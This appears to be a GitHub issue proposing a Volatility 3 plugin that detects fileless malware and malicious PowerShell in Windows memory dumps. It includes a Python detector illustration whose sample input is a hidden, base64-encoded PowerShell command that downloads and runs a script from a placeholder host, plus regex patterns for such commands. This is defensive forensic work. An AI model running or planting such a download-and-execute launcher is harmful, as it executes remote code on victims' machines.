
Fileless Malware Hunter Volatility3 Plugin

Open malfav opened this issue 1 month ago • 1 comment

fileless.py – Advanced Fileless Malware Hunter (Volatility 3 Plugin)

fileless.py is a dedicated Volatility 3 plugin built for advanced forensic analysis of Windows memory dumps.
Its primary focus is detecting and reporting threats related to fileless malware, in-memory injection, and other stealthy attack techniques that evade traditional disk-based antivirus detection.


Key Capabilities

Fileless Threat Detection

Scans memory artifacts to uncover indicators of fileless attacks, including:

  • Reflective DLL loading and process injection
  • In-memory PowerShell and script-based payloads
  • Heavily obfuscated or encoded commands

Enhanced PowerShell Analysis

Employs a comprehensive set of regular expressions (POWERSHELL_PATTERNS) to detect malicious PowerShell behavior, such as:

  • Use of -encodedcommand with high-entropy or base64-encoded strings
  • Invocation of Invoke-Expression (IEX) for dynamic code execution
  • Network payload retrieval via .Net.WebClient or DownloadString calls

In-Memory Artifact Scanning

Leverages Volatility 3’s core analysis modules (pslist, vadinfo, handles) to identify suspicious or anomalous memory regions:

  • Detection of memory hollowing and unsigned code injection
  • Correlation of Virtual Address Descriptors (VADs) with process metadata
  • Identification of mismatched or hidden modules

Structured Forensic Reporting

Automatically generates a detailed TreeGrid-style report that presents findings in a structured and analyst-friendly format for triage and incident response.


Reporting and Triage

The plugin provides automated scoring and classification of detected threats to accelerate analysis:

| Report Column | Description |
| --- | --- |
| Detection Type | Category of the threat (e.g., PowerShell Encoded Command, Suspicious Memory Region) |
| Severity | Risk rating to prioritize analysis (Critical, High, Medium) |
| MITRE ATT&CK | Maps identified behaviors to MITRE ATT&CK techniques for adversary tracking and intelligence correlation |
| Indicator | The exact pattern, command, or string that triggered the detection (e.g., base64-encoded command string) |

malfav, Nov 10 '25 21:11
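As an added illustration of the PowerShell-pattern detection and the report columns the proposal above describes (this is example code written for this page, not the fileless.py plugin's own code, and the plugin's POWERSHELL_PATTERNS list is not published here): a standalone Python module that runs a small regex set over strings, decodes -EncodedCommand blobs (base64 of UTF-16LE text), scores entropy, and emits rows with the Detection Type / Severity / MITRE ATT&CK / Indicator columns from the table. The pattern names, severity values, technique mappings and sample strings are all this example's own choices; in a real Volatility 3 plugin the input strings would be carved from process memory rather than constructed inline.

```python
"""Added example: PowerShell fileless-indicator detection over carved strings.
Not the proposed fileless.py plugin's code; patterns, severities and the
MITRE mapping below are this example's assumptions."""
import base64
import math
import re
from dataclasses import dataclass


def shannon_entropy(s: str) -> float:
    """Bits per character. Random base64 text scores well above 5; English ~4."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def decode_encoded_command(blob: str):
    """-EncodedCommand carries base64 of UTF-16LE text; return the text or None."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


@dataclass
class Finding:
    detection_type: str
    severity: str
    mitre: str
    indicator: str


# (regex, detection type, severity, technique) - constructed for this example.
ENCODED_CMD = "PowerShell Encoded Command"
PATTERNS = [
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I),
     ENCODED_CMD, "High", "T1027 / T1059.001"),
    (re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
     "Dynamic Code Execution", "High", "T1059.001"),
    (re.compile(r"Net\.WebClient|DownloadString|DownloadFile", re.I),
     "Network Payload Retrieval", "Critical", "T1105"),
]


def scan_strings(strings, entropy_threshold: float = 4.5):
    """Return one Finding per pattern hit; decoded payloads are rescanned."""
    findings = []
    for s in strings:
        for rx, dtype, sev, tech in PATTERNS:
            m = rx.search(s)
            if not m:
                continue
            if dtype != ENCODED_CMD:
                findings.append(Finding(dtype, sev, tech, m.group(0)))
                continue
            blob = m.group(1)
            decoded = decode_encoded_command(blob)
            # A blob that decodes cleanly is the strong signal; entropy alone is a
            # weak one because UTF-16LE zero bytes drag the base64 entropy down.
            if decoded is None and shannon_entropy(blob) < entropy_threshold:
                continue
            shown = blob[:32] + ("..." if len(blob) > 32 else "")
            findings.append(Finding(dtype, sev, tech, shown))
            if decoded:
                findings.extend(scan_strings([decoded], entropy_threshold))
    return findings


# Constructed sample input: one encoded launcher plus two benign strings.
SAMPLE_PAYLOAD = (
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
)
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_STRINGS = [
    "powershell.exe -nop -w hidden -enc " + SAMPLE_B64,
    "C:\\Windows\\System32\\notepad.exe",
    "Get-ChildItem -Path C:\\Users -Recurse",
]


def render_report(findings):
    """TreeGrid-style rows: one tuple per finding in the table's column order."""
    return [(f.detection_type, f.severity, f.mitre, f.indicator) for f in findings]


if __name__ == "__main__":
    for row in render_report(scan_strings(SAMPLE_STRINGS)):
        print(" | ".join(row))
```

Note the order of the rows: the encoded-command hit comes first, and the IEX and Net.WebClient hits that follow come from rescanning the decoded payload, which is where a plugin should look, since the outer string only contains base64. Flagging on entropy alone would miss exactly this case.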

this screams AI and also the plugin is basically malfind with additional basic YARA malware families .-.

SolitudePy, Nov 13 '25 20:11